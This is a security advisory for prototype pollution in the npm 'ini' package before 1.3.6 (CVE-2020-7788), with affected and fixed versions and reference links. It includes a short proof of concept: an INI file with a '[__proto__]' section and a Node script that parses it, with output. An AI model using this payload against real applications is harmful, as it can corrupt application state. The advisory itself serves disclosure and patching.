[NPM:GHSA-QQGX-2P2H-9C37] ini before 1.3.6 vulnerable to Prototype Pollution via ini.parse

Severity High

Affected Packages 1

Fixed Packages 1

CVEs 1

Overview

The ini npm package before version 1.3.6 has a Prototype Pollution vulnerability.

If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.

Patches

This has been patched in 1.3.6.

Steps to reproduce

payload.ini
[__proto__] polluted = "polluted"

poc.js:
```
var fs = require('fs')
var ini = require('ini')

var parsed = ini.parse(fs.readFileSync('./payload.ini', 'utf-8'))
console.log(parsed)
console.log(parsed.__proto__)
console.log(polluted)
```

```

node poc.js
{}
{ polluted: 'polluted' }
{ polluted: 'polluted' }
polluted
```

Package	Affected Version
pkg:npm/ini	< 1.3.6

Package	Fixed Version
pkg:npm/ini	= 1.3.6

ID

NPM:GHSA-QQGX-2P2H-9C37

Severity

high

URL

https://github.com/advisories/GHSA-qqgx-2p2h-9c37

Published

2020-12-10T16:53:45
(3 years ago)

Modified

2023-08-31T23:39:55
(12 months ago)

Rights

NPM Security Team

Other Advisories

Source	# ID	Name	URL
			https://github.com/npm/ini/commit/56d2805e07ccd94e2ba0984ac9240ff02d44b6f1
			https://www.npmjs.com/advisories/1589
			https://snyk.io/vuln/SNYK-JS-INI-1048974
			https://nvd.nist.gov/vuln/detail/CVE-2020-7788
			https://lists.debian.org/debian-lts-announce/2020/12/msg00032.html
			https://github.com/advisories/GHSA-qqgx-2p2h-9c37

Type	Package URL	Namespace	Name / Product	Version	Distribution / Platform	Arch	Patch / Fix
Affected	pkg:npm/ini		ini	< 1.3.6
Fixed	pkg:npm/ini		ini	= 1.3.6

# CVE	Description	CVSS	EPSS	EPSS Trend (30 days)	Affected Products	Weaknesses	Security Advisories	Exploits	PoC	Pubblication Date	Modification Date
# CVE	Description	CVSS	EPSS	EPSS Trend (30 days)	Affected Products	Weaknesses	Security Advisories	PoC	Pubblication Date	Modification Date